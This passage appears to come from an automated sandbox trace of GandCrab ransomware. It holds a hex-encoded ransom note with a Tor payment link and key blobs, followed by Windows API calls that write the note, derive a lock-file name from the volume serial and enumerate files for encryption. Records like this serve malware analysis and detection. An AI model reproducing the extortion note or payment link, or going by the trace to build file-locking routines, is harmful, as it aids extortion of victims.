x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0092.354] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0092.355] CloseHandle (hObject=0x2ac) returned 1 [0092.355] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.355] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.355] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x25, wMilliseconds=0x295)) [0092.355] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.355] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0092.355] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0092.356] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\d2ca4a09d2ca4deb61a.lock") returned 62 [0092.356] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\favorites\\links\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0092.356] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.356] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.356] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\") returned 38 [0092.356] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\*" [0092.357] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0x5038f8 [0092.357] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.357] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0092.358] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.358] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.358] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0092.358] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0092.358] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0092.358] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Links\\d2ca4a09d2ca4deb61a.lock" [0092.358] lstrlenW (lpString=".titwmvjl") returned 9 [0092.358] lstrlenW 